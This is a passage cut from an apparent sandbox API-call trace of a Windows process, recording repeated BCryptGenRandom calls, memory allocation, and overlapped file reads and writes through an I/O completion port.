dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.957] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.957] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.958] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.958] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.958] free (_Block=0x3e305b8) [0199.958] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.958] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.958] free (_Block=0x1fa91d0) [0199.958] free (_Block=0x1fa2ed8) [0199.958] free (_Block=0x1fa90b8) [0199.958] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.969] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x6f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.977] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.978] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.978] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.978] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.978] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.978] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.978] free (_Block=0x3e305b8) [0199.978] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.978] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.979] free (_Block=0x1fa91d0) [0199.979] free (_Block=0x1fa2ed8) [0199.979] free (_Block=0x1fa90b8) [0199.979] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0199.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0199.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0199.985] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.985] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0199.986] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.986] free (_Block=0x3e305b8) [0199.986] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.986] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.986] free (_Block=0x1fa91d0) [0199.986] free (_Block=0x1fa2ed8) [0199.986] free (_Block=0x1fa90b8) [0199.986] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0199.986] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.848] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1560, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0200.849] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.855] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0200.856] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.856] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.856] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0200.856] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.856] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.856] free (_Block=0x3e305b8) [0200.856] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.856] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.857] free (_Block=0x1fa91d0) [0200.857] free (_Block=0x1fa2ed8) [0200.857] free (_Block=0x1fa90b8) [0200.857] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0200.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.870] CloseHandle (hObject=0x3cc) returned 1 [0200.870] free (_Block=0x3d70450) [0200.870] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.871] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0200.871] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0200.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0200.975] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0200.975] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0200.975] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0200.975] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0200.975] free (_Block=0x3e305b8) [0200.975] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0200.975] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0200.975] free (_Block=0x1fa91d0) [0200.975] free (_Block=0x1fa2ed8) [0200.975] free (_Block=0x1fa90b8) [0200.975] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0200.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0200.992] CloseHandle (hObject=0x308) returned 1 [0200.993] free (_Block=0x1ff1e60) [0200.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0201.007] CloseHandle (hObject=0x170) returned 1 [0201.008] free (_Block=0x3df0008) [0201.008] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.105] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x94, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.105] CloseHandle (hObject=0x308) returned 1 [0204.106] free (_Block=0x3d70450) [0204.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.122] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0204.123] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.123] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.123] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0204.123] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.123] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.123] free (_Block=0x3e305b8) [0204.123] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0204.123] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0204.124] free (_Block=0x1fa9400) [0204.124] free (_Block=0x77d7a8) [0204.124] free (_Block=0x1fa92e8) [0204.124] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.124] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.124] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.133] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x65, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.133] CloseHandle (hObject=0x308) returned 1 [0204.133] free (_Block=0x3d70450) [0204.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.139] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0204.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.140] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.140] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0204.140] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.140] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.140] free (_Block=0x3e305b8) [0204.140] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0204.140] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0204.141] free (_Block=0x1fa9400) [0204.141] free (_Block=0x77d7a8) [0204.141] free (_Block=0x1fa92e8) [0204.141] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.141] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.141] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.149] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0204.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.149] CloseHandle (hObject=0x308) returned 1 [0204.149] free (_Block=0x3d70450) [0204.149] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0204.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0204.156] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0204.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0204.156] free (_Block=0x3e305b8) [0204.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0204.156] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0204.157] free (_Block=0x1fa9400) [0204.157] free (_Block=0x77d7a8) [0204.157] free (_Block=0x1fa92e8) [0204.157] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.157] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0204.157] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0204.164] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0204.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0206.019] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0206.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0206.021] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.021] free (_Block=0x3e305b8) [0206.021] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.021] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.021] free (_Block=0x1fa91d0) [0206.021] free (_Block=0x1fa2ed8) [0206.021] free (_Block=0x1fa90b8) [0206.021] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0206.022] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0206.033] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xaa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0206.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0206.041] CloseHandle (hObject=0x2a8) returned 1 [0206.042] free (_Block=0x1ff1e60) [0206.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0209.741] CloseHandle (hObject=0x170) returned 1 [0209.741] free (_Block=0x3df0008) [0209.741] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0209.752] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0209.752] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff) Thread: id = 15 os_tid = 0x8f4 [0069.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0076.939] ReadFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xce00, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0076.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0076.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.969] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.969] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0076.969] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0076.973] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0076.973] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0076.973] free (_Block=0x77d800) [0076.973] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0076.973] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0076.973] free (_Block=0x1ff1930) [0076.973] free (_Block=0x1ff1a40) [0076.973] free (_Block=0x77d908) [0076.973] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0076.974] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0076.981] WriteFile (in: hFile=0x3a8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x18210, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0076.982] 